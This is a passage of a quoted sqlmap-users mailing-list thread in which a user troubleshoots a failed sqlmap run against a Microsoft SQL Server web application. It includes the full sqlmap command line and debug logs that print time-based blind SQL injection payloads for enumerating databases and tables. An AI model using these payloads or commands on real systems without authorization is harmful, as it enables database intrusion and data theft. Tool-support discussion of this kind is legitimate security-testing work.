>> >     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>> >     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>> >     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>> >     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> >     [...snip...]
>> >     [11:57:49] [INFO] confirming Microsoft SQL Server
>> >     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> >     web server operating system: Windows
>> >     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
>> >     <http://ASP.NET> 2.X.XXXXX (redacted)
>> >     back-end DBMS: Microsoft SQL Server 2008
>> >     [11:57:49] [INFO] fetching database names
>> >     [11:57:49] [INFO] fetching number of databases
>> >     [11:57:49] [WARNING] multi-threading is considered unsafe in
>> time-based
>> >     data retrieval. Going to switch it off automatically
>> >     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> >     [11:57:49] [WARNING] time-based comparison requires larger
>> statistical
>> >     model, please wait..............................
>> >     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> >     [11:58:25] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential
>> errors
>> >     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:55] [INFO] retrieved:
>> >     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> >     [11:59:55] [WARNING] in case of continuous data retrieval problems
>> you
>> >     are advised to try a switch '--no-cast' or switch '--hex'
>> >     [11:59:55] [ERROR] unable to retrieve the number of databases
>> >
>> >     However, for the *database names* sqlmap will continue with the
>> >     DB_NAME(X) technique. Right now it is dumping out all the different
>> >     database names, which works fine:
>> >
>> >     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>> >     WAITFOR DELAY '0:0:2'; --
>> >
>> >     Because I got many of the following errors (and the occurence of the
>> >     error is random), I patched the time delay in the python code to be
>> >     fixed to 2 seconds (maybe you want to have an option for that):
>> >
>> >     [15:03:14] [ERROR] invalid character detected. retrying..
>> >     [15:03:14] [WARNING] increasing time delay to 3 seconds
>> >
>> >     That works fine and I get good results. However, when I try to dump
>> >     table names now (from one of the known databases) with the -D
>> DB_NAME
>> >     and --tables switch, it is again failing to retrieve the number of
>> >     tables:
>> >
>> >     [14:51:53] [INFO] fetching tables for database: DB_NAME
>> >     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> >     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:51:53] [WARNING] time-based comparison requires larger
>> statistical
>> >     model, please wait..............................
>> >     [14:52:26] [CRITICAL] considerable lagging has been detected in
>> >     connection response(s). Please use as high value for option
>> '--time-sec'
>> >     as possible (e.g. 10 or more)
>> >     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:52:56] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential
>> errors
>> >     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:54:56] [INFO] retrieved:
>> >     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> >     [...]
>> >     [14:57:27] [INFO] retrieved:
>> >     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> >     [...]
>> >     [14:59:57] [INFO] retrieved:
>> >     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> >     [14:59:57] [WARNING] unable to retrieve the number of tables for
>> >     database 'DB_NAME'
>> >     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> >
>> >     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>> >     help. Using --start and --stop also didn't work. I can't get any
>> data
>> >     out of it like this.
>> >
>> >     Best regards,
>> >     floyd
>> >
>> >
>>  ------------------------------------------------------------------------------
>> >     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> >     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
>> Reports
>> >     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> >     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>> >
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> >     _______________________________________________
>> >     sqlmap-users mailing list
>> >     sql...@li...
>> >     <mailto:sql...@li...>
>> >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>